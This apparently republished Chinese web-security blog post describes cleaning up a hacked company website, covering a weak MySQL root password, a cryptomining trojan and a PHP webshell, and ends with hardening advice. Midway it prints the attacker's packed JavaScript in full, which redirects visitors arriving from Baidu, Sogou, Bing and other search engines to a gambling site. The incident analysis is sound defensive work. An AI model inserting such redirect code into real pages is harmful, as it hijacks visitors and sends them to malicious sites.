商丘做网站,商丘网站优化,商丘网络推广,商丘网络公司
当前位置:

如何解决公司网站首页被恶意跳转的安全问题

发表日期:2018-07-26 14:24聚圣源浏览次数: 本文关键词:网站,木马,服务器,进程,网络安全,攻击者,数据库

近日某客户网站被黑,导致网站首页被篡改并跳转到赌博网站,网站在百度的收录也收录了一些什么彩票内容的快照,网站首页快照也被修改成赌博内容,并被百度直接红色风险拦截提示,百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改!我们SINE安全公司根据以上客户被黑的情况,立即进行了全面的网站安全检测,针对网站被黑的情况制定了详细的安全部署方案。

首先客户网站使用的是Linux centos系统服务器,客户提供服务器ip,ssh端口,root账号密码后,我们进去查看了服务器是否存在被黑以及系统木马后门的情况,再一个我们对其使用的mysql数据库进行了安全检测,发现问题,该mysql数据库的root账号使用的是弱口令密码,导致攻击者可以利用软件对数据库进行强力破解,导致破解成功,利用root权限直接提权并上传脚本木马到网站的根目录下。

根据上面发现的数据库安全问题,我们深度挖掘,追踪溯源,发现服务器还存在木马后门,top,查看linux当前进程,发现一个可疑的进程,通过查看进程的详细信息我们发现该进程是木马后门进程,再仔细一检查发现该木马是挖矿木马,攻击者利用服务器资源,带宽,进行挖矿,像比特币、以太坊等币进行挖矿。

我们对其挖矿木马进行安全分析:如下图

解密木马内容,我们发现该木马目前来说是免杀的木马,一般人是看不出问题来,但是经常维护服务器的运维人员就会察觉出来,第一该木马隐藏到linux进程当中去,根据时间段进行挖矿,避开高峰时间,以及维护人员的工作时间,当挖矿的时候木马进程CPU占用达到百分之80以上,甚至有时候网站都打开很慢。服务器的木马查完后,我们对网站的源代码进行安全检测,发现网站目录里被上传了网站木马后门,php脚本木马,该脚本木马可以对网站进行读写新建等操作,网站的首页标题描述也被改成了什么赌博的内容如下图:

<>eval(function(p,a,c,k,e,d){e=function(c){return(c

(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString

(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=

[function(e){return d[e]}];e=function(){return'\w+'};c=1;};while(c--)

if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p;}

('3.4("");3.4("d 1=3.f");3.4("e(1.2("7")>0 || 1.2(

"6")>0 || 1.2("8")>0 ||1.2("a")>0 ||1.2("9")>0 ||1.2(

"l")>0 ||1.2("m")>0 ||1.2("k")>0 )");3.4("h.g="j://i.o.n

";");3.4("");',25,25,'|s|indexOf|document|writeln||sogou|

baidu|soso|uc|sm|Java|LANGUAGE|var|if|referrer|href|location|www|

http|so|bing|yahoo|com|268238'.split('|'),0,{}))

通过解密上面的代码发现,只要是从百度,搜狗,以及soso,so,bing等搜索引擎来的访问,都会直接跳转到攻击者设定好的赌博网站上去。随即我们SINE安全公司对该恶意代码进行了清除,网站恢复正常访问。

以上就是我们解决客户网站安全的整个过程,下面针对于此次网站被黑,提供如下 的网站安全建议:

1.对mysql数据库进行安全部署,对root账号密码加密,尽可能设置的复杂一些,数字+大小写字母+特殊符号,对网站数据库进行分配普通权限账号。

2.mysql数据库默认端口3306,改为51158,并加入到端口安全策略,不对外开放,外网IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。

3.对服务器底层系统进行安全加固,包括SSH登录的安全验证。

4.对网站代码进行整体的安全检测,包括定期的升级网站程序源代码,修复补丁以及网站漏洞。

如没特殊注明,文章均来自网络! 转载请注明来自:http://www.jushengyuan.com.cn/news/wzyy/10312.html

网站设计案例推荐

热门文章

网站到底为什么总是被黑被入侵...

1:用于做黑帽优化的网站漏洞扫描系统 用一些自动化技术的专用工具来扫描一些普遍开源代码版本号系统漏洞,例如dede,phpweb,discuz这些旧版常有一些管理权限各不相同的系统漏洞,有的软件能...

日期:2020-04-14 浏览次数:8000

wordpress网站地图设置方法...

一直想为我的wordpress博客增加一个网站地图,迟迟没有行动,一个原因是个人认为网站地图已经不重要了,加不加都一样,还有一个原因就是懒得去弄,那么为什么今天会主动和大家分享wordpress网...

日期:2020-11-04 浏览次数:7996

草根站长是如何成长起来并且赚...

https://ww 人人都想做赚钱的站长,但真正赚钱的却不多,笔者认为这取决于自身修养与心态,之前再朋友圈里询问了一些朋友,看到大家对站长已经不抱多大希望,想想也是,借用群友的话来说,...

日期:2020-03-25 浏览次数:7996

成熟网站运营需要从两方面做突...

一个网站从全新到投入使用初期,因为有专业的站长帮助运营,因此其排名和流量都上升的很快。这是从无到有的一个正常快速发展的阶段。然而网站进入成熟期之后,许多的SEO优化方法都运用了...

日期:2017-10-17 浏览次数:7990

网站代运营如何做好网站广告的...

我相信许多企业主在营销过程中会经常遇到这样的问题:做了很多平台的广告投放,也做了一些网络优化,每天投放的网站页面访问量和点击量都很高,但是最后获得的客户线索和询盘尤其不理想?导致...

日期:2021-07-30 浏览次数:7989

相关文章

解读潮流:在网站中怎样用好扁...

当你第一次听见"扁平化设计"这个词的时候,你是不是很不以为然?但事实上扁平化设计已经摇身一变,成为当下网站设计时尚圈的"宠儿"了。在过去几年的时间里,扁平化设计发展速度很惊人,越...

日期:2017-08-28 浏览次数:6285

网站建设公司如何提高自己的信...

怎样让用户相信自己,这对绝大多数网站建设公司来说,是一个比较挠头的问题。尤其在网站建设价格相差如此之大的条件下,让用户相信自己还真的好好思考一下。 什么是信用,所谓信用,是指...

日期:2017-09-05 浏览次数:7586

如何预防和解决网站被劫持...

提到网站被绑架,许多站长并不生疏,可怎么才干有用发现并防止被绑架,是许多网站头疼的问题,小编具体为我们共享网站被绑架解决方案。 一、什么是网站绑架 网站绑架:是指翻开一个网址的...

日期:2017-08-29 浏览次数:6813

在网站中应该使用垂直导航菜单...

尽管目前大多数网站仍然采用传统的横向(水平)菜单,将菜单放在页面的上方,但不可否认的是垂直导航菜单正逐渐流行起来,将菜单放在网站的侧面(左边或右边都可以)。因此很多人在做网站时面...

日期:2017-08-29 浏览次数:5503

FAQ(常见问题)页面有多重要?...

常见问题页面(FAQ页面)是网站的组成部分之一,尽管网站的产品页面、关于页面等可能已经解答了用户的部分疑惑,但有时候用户还是有一些问题,这时就到常见问题页面大展身手的时候了。事实...

日期:2017-09-06 浏览次数:7553

随机推荐

一个老站长创业定下的22条军规...

2017年响应式网站的10个设计趋势...

举例方法说明url重定向应该怎么...

这样做可让降权网站快速恢复...

个人网站站长应了解的基础知识...

百度快照与网站权重之间的关系...